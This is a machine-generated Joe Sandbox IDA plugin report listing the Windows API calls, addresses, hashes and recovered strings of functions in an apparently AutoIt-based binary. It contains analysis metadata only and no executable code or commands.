                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                            • String ID:
                                            • API String ID: 1413079979-0
                                            • Opcode ID: 8e781a113d429d5326ea4c298f0d1194038f308b84c78b43b79fab9283a66fb4
                                            • Instruction ID: 05b0bcccbf46f7a833059e645baae52c6bd7352d8797a72d6a7e166a270b3c80
                                            • Opcode Fuzzy Hash: 8e781a113d429d5326ea4c298f0d1194038f308b84c78b43b79fab9283a66fb4
                                            • Instruction Fuzzy Hash: E61159B6540209AFDF018FA5ED49FDE7BA9EF08348F045166FE04B2160C7768D64EB60
                                            APIs
                                              • Part of subcall function 00E112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E1134D
                                              • Part of subcall function 00E112F3: SelectObject.GDI32(?,00000000), ref: 00E1135C
                                              • Part of subcall function 00E112F3: BeginPath.GDI32(?), ref: 00E11373
                                              • Part of subcall function 00E112F3: SelectObject.GDI32(?,00000000), ref: 00E1139C
                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E9C1C4
                                            • LineTo.GDI32(00000000,00000003,?), ref: 00E9C1D8
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E9C1E6
                                            • LineTo.GDI32(00000000,00000000,?), ref: 00E9C1F6
                                            • EndPath.GDI32(00000000), ref: 00E9C206
                                            • StrokePath.GDI32(00000000), ref: 00E9C216
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                            • String ID:
                                            • API String ID: 43455801-0
                                            • Opcode ID: 73a8b5cfdd16b5a9aa4d20a6a830d938b556130ee1d1412e62e224d4cdc545e9
                                            • Instruction ID: 97dc35167deb0713c42582c5bd7641bc49b3d772e59e295726cb2fe08213bbd7
                                            • Opcode Fuzzy Hash: 73a8b5cfdd16b5a9aa4d20a6a830d938b556130ee1d1412e62e224d4cdc545e9
                                            • Instruction Fuzzy Hash: EE111E7640014DBFDF119F91EC88EDA7FADEB08354F148022FA18A6171C7719D59DBA0
                                            APIs
                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E303D3
                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E303DB
                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E303E6
                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E303F1
                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E303F9
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E30401
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Virtual
                                            • String ID:
                                            • API String ID: 4278518827-0
                                            • Opcode ID: c7237fae74972b7e50e7a9159b835805d6c18173b7446042dccf8ea7c21acafb
                                            • Instruction ID: 9c3ed25911360e780abc56fed22447029bc0ecfea671143a5cb91dbd923d760a
                                            • Opcode Fuzzy Hash: c7237fae74972b7e50e7a9159b835805d6c18173b7446042dccf8ea7c21acafb
                                            • Instruction Fuzzy Hash: 340148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15887942C7B5A868CBE5
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E7569B
                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E756B1
                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00E756C0
                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E756CF
                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E756D9
                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E756E0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                            • String ID:
                                            • API String ID: 839392675-0
                                            • Opcode ID: b817c9c989bff4c1b57742144d8a186cbb2aae7e5aa8e95c3f7ba3f26de9d48a
                                            • Instruction ID: 4ac2d774c53ec30f96d9d51b50eed68059e41162b09d0b54cb0f85ea3e9ac7d1
                                            • Opcode Fuzzy Hash: b817c9c989bff4c1b57742144d8a186cbb2aae7e5aa8e95c3f7ba3f26de9d48a
                                            • Instruction Fuzzy Hash: E8F01D32641259BFE7215BA39C0DEAF7A7CEBC6B11F00016BFA05E105196A15A0586F5
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,?), ref: 00E774E5
                                            • EnterCriticalSection.KERNEL32(?,?,00E21044,?,?), ref: 00E774F6
                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00E21044,?,?), ref: 00E77503
                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E21044,?,?), ref: 00E77510
                                              • Part of subcall function 00E76ED7: CloseHandle.KERNEL32(00000000,?,00E7751D,?,00E21044,?,?), ref: 00E76EE1
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E77523
                                            • LeaveCriticalSection.KERNEL32(?,?,00E21044,?,?), ref: 00E7752A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                            • String ID:
                                            • API String ID: 3495660284-0
                                            • Opcode ID: 256949295fba9baab8159b3bfd584028f32b17ca5a8967cdb53ece3ddb73c8af
                                            • Instruction ID: dc8c91fce76d6373a9ea8072daed5c4acb26a00c4e42ac8ac0ecc667203b6e03
                                            • Opcode Fuzzy Hash: 256949295fba9baab8159b3bfd584028f32b17ca5a8967cdb53ece3ddb73c8af
                                            • Instruction Fuzzy Hash: 09F03A3A540612AFDB111B65EC88AEA772AEF45306B101533F602F10B1CB756915CBA0
                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E68E7F
                                            • UnloadUserProfile.USERENV(?,?), ref: 00E68E8B
                                            • CloseHandle.KERNEL32(?), ref: 00E68E94
                                            • CloseHandle.KERNEL32(?), ref: 00E68E9C
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E68EA5
                                            • HeapFree.KERNEL32(00000000), ref: 00E68EAC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                            • String ID:
                                            • API String ID: 146765662-0
                                            • Opcode ID: e6ac075cfa2ccfa7703110dd1bce7e3025400b9bce79d129bf1a8cf976f0715e
                                            • Instruction ID: 2ec9df965f067492369dde7636271f4f0d57558738c08344969cc14dfb079c49
                                            • Opcode Fuzzy Hash: e6ac075cfa2ccfa7703110dd1bce7e3025400b9bce79d129bf1a8cf976f0715e
                                            • Instruction Fuzzy Hash: 1AE0C236004001FFDA015FF3EC0C90ABB69FB89322B208233F219E1071CB329428DB90
                                            APIs
                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00EA2C7C,?), ref: 00E67C32
                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00EA2C7C,?), ref: 00E67C4A
                                            • CLSIDFromProgID.OLE32(?,?,00000000,00E9FB80,000000FF,?,00000000,00000800,00000000,?,00EA2C7C,?), ref: 00E67C6F
                                            • _memcmp.LIBCMT ref: 00E67C90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FromProg$FreeTask_memcmp
                                            • String ID: ,,
                                            • API String ID: 314563124-1556401989
                                            • Opcode ID: 8189a946ccacd8600dda5388af67789a138749b41e58c09e2bd0cf0d9aaf4ab6
                                            • Instruction ID: 577fca4c9cef824b088278c79be515b1e83c1dd1dee5fd4a2d3bb93412030aa7
                                            • Opcode Fuzzy Hash: 8189a946ccacd8600dda5388af67789a138749b41e58c09e2bd0cf0d9aaf4ab6
                                            • Instruction Fuzzy Hash: 12813B71A00109EFCB04DF94C884DEEB7B9FF89359F204198E546BB250DB71AE06CB60
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 00E88928
                                            • CharUpperBuffW.USER32(?,?), ref: 00E88A37
                                            • VariantClear.OLEAUT32(?), ref: 00E88BAF
                                              • Part of subcall function 00E77804: VariantInit.OLEAUT32(00000000), ref: 00E77844
                                              • Part of subcall function 00E77804: VariantCopy.OLEAUT32(00000000,?), ref: 00E7784D
                                              • Part of subcall function 00E77804: VariantClear.OLEAUT32(00000000), ref: 00E77859
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                            • API String ID: 4237274167-1221869570
                                            • Opcode ID: b5dc3f6072e4dcd524420a62d26f71a68b5ca7dded7c1fd8613a582acc434fb9
                                            • Instruction ID: 40dee2f761dd86a30d3f3c66d3639b3ae0b225cd9fff6e6c84b138e1da7a82c1
                                            • Opcode Fuzzy Hash: b5dc3f6072e4dcd524420a62d26f71a68b5ca7dded7c1fd8613a582acc434fb9
                                            • Instruction Fuzzy Hash: 94919F756083019FC710EF24C5849AABBE4EFC8344F04596EF89EAB362DB31E945CB52
                                            APIs
                                              • Part of subcall function 00E2FEC6: _wcscpy.LIBCMT ref: 00E2FEE9
                                            • _memset.LIBCMT ref: 00E73077
                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E730A6
                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E73159
                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E73187
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                            • String ID: 0
                                            • API String ID: 4152858687-4108050209
                                            • Opcode ID: f3b941d7d7b5cd24af3392f61b0c249a5bb48dc393a8c66462e09a6f1bf75ebb
                                            • Instruction ID: 96862a9380f83c39dbb81016ac2eb9afa60b7bf03a2cf7dfe7531dfbb6f49b56
                                            • Opcode Fuzzy Hash: f3b941d7d7b5cd24af3392f61b0c249a5bb48dc393a8c66462e09a6f1bf75ebb
                                            • Instruction Fuzzy Hash: 2F51E43160A3009ED7659F38D845A6BBBE4EF85314F44AA2EF889F3191DB70CE44E752
                                            APIs
                                            • _memset.LIBCMT ref: 00E72CAF
                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E72CCB
                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00E72D11
                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00ED6890,00000000), ref: 00E72D5A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$Delete$InfoItem_memset
                                            • String ID: 0
                                            • API String ID: 1173514356-4108050209
                                            • Opcode ID: 42234d5ddebf23662869167e61807a702a812dc4133f8822c15e1243d11acc74
                                            • Instruction ID: d4df7872bccf8fe09144812c199e26213d28ba0e437c0a99ad3f9666e5575c7b
                                            • Opcode Fuzzy Hash: 42234d5ddebf23662869167e61807a702a812dc4133f8822c15e1243d11acc74
                                            • Instruction Fuzzy Hash: FC4191302043019FD724DF24C845B5ABBE8EF85324F14965EFA69E72D1D770E905CB92
                                            APIs
                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E8DAD9
                                              • Part of subcall function 00E179AB: _memmove.LIBCMT ref: 00E179F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharLower_memmove
                                            • String ID: cdecl$none$stdcall$winapi
                                            • API String ID: 3425801089-567219261
                                            • Opcode ID: d4f96799907b41964e8b45dce3a0256d19f55923df2abda13b6ba209711a3786
                                            • Instruction ID: 517c158304f4185ff6a4bfffe35be2c71a6193ff82ffb581a536e3c211db8782
                                            • Opcode Fuzzy Hash: d4f96799907b41964e8b45dce3a0256d19f55923df2abda13b6ba209711a3786
                                            • Instruction Fuzzy Hash: 79317A7150421AABCB10EF54CC819EEB7F4FF45324F109A2AE869B76D1CB31A946CB80
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E693F6
                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E69409
                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E69439
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$_memmove$ClassName
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 365058703-1403004172
                                            • Opcode ID: 0b5a749d394b5905a56f37b774041b61f50919a871e5e22d57974030a380f8fa
                                            • Instruction ID: df46eae985701df24634139b3e47403a11276e3547cc5cb15a6be9576a9bad47
                                            • Opcode Fuzzy Hash: 0b5a749d394b5905a56f37b774041b61f50919a871e5e22d57974030a380f8fa
                                            • Instruction Fuzzy Hash: A421E671A80204BEDB14ABB0EC85DFFB7BCDF45790B10611AF825B72E2DF35094A9620
                                            APIs
                                              • Part of subcall function 00E11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E11D73
                                              • Part of subcall function 00E11D35: GetStockObject.GDI32(00000011), ref: 00E11D87
                                              • Part of subcall function 00E11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E11D91
                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E966D0
                                            • LoadLibraryW.KERNEL32(?), ref: 00E966D7
                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E966EC
                                            • DestroyWindow.USER32(?), ref: 00E966F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                            • String ID: SysAnimate32
                                            • API String ID: 4146253029-1011021900
                                            • Opcode ID: 8c7b09efaa81c9a2d37ba10d58feccd7ae6f7ef32df2dc269a9941546af8f97c
                                            • Instruction ID: a3ac5dd3bb26dea8843a6d5b31b871f27803899ff1e84c5dd57e542b14f9c9a5
                                            • Opcode Fuzzy Hash: 8c7b09efaa81c9a2d37ba10d58feccd7ae6f7ef32df2dc269a9941546af8f97c
                                            • Instruction Fuzzy Hash: 43219DB1200206AFEF104FA4EC80EBB37ADEB59368F10662BF911F2191D771CC919760
                                            APIs
                                            • GetStdHandle.KERNEL32(0000000C), ref: 00E7705E
                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E77091
                                            • GetStdHandle.KERNEL32(0000000C), ref: 00E770A3
                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E770DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateHandle$FilePipe
                                            • String ID: nul
                                            • API String ID: 4209266947-2873401336
                                            • Opcode ID: a83dbeea928aacb31eeab08721b288a91bb3cf442e42e42739fd3de620be00e2
                                            • Instruction ID: 6f636faf2503a74d2a748f9846703e45f0360dc26bbf5a48dc3a4cd1cab67fa6
                                            • Opcode Fuzzy Hash: a83dbeea928aacb31eeab08721b288a91bb3cf442e42e42739fd3de620be00e2
                                            • Instruction Fuzzy Hash: E1214F74604209ABDF209F39DC05A9A77A8BF44728F20962AF8E5E72D0D77199508B50
                                            APIs
                                            • GetStdHandle.KERNEL32(000000F6), ref: 00E7712B
                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E7715D
                                            • GetStdHandle.KERNEL32(000000F6), ref: 00E7716E
                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E771A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateHandle$FilePipe
                                            • String ID: nul
                                            • API String ID: 4209266947-2873401336
                                            • Opcode ID: cc7848c44ae0eb3161382a697671d012d20e638bc0e6e0ac9f52f9bca282d08c
                                            • Instruction ID: cd6472f91090ad864f6e7d649f2b516925f23abcbddcd5161b9f6df281880cef
                                            • Opcode Fuzzy Hash: cc7848c44ae0eb3161382a697671d012d20e638bc0e6e0ac9f52f9bca282d08c
                                            • Instruction Fuzzy Hash: 0A21B3756053059BDF209F699C04AAAB7E8AF55738F60961AFCF4F32D0D7709841CB60
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 00E7AEBF
                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E7AF13
                                            • __swprintf.LIBCMT ref: 00E7AF2C
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E9F910), ref: 00E7AF6A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$InformationVolume__swprintf
                                            • String ID: %lu
                                            • API String ID: 3164766367-685833217
                                            • Opcode ID: baaffab684ed6afa6ff65f1aa646811a9ce10454bec1d821ac42911af7137b11
                                            • Instruction ID: e67d434365862086fc9cfcf18e00a25a1113ad92c340ea4cc24abf7a76cd4dd8
                                            • Opcode Fuzzy Hash: baaffab684ed6afa6ff65f1aa646811a9ce10454bec1d821ac42911af7137b11
                                            • Instruction Fuzzy Hash: EC213231600209AFCB10EB65D985DEE7BF8EF89704B144069F909FB252DB31EA45CB61
                                            APIs
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                              • Part of subcall function 00E6A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E6A399
                                              • Part of subcall function 00E6A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E6A3AC
                                              • Part of subcall function 00E6A37C: GetCurrentThreadId.KERNEL32 ref: 00E6A3B3
                                              • Part of subcall function 00E6A37C: AttachThreadInput.USER32(00000000), ref: 00E6A3BA
                                            • GetFocus.USER32 ref: 00E6A554
                                              • Part of subcall function 00E6A3C5: GetParent.USER32(?), ref: 00E6A3D3
                                            • GetClassNameW.USER32(?,?,00000100), ref: 00E6A59D
                                            • EnumChildWindows.USER32(?,00E6A615), ref: 00E6A5C5
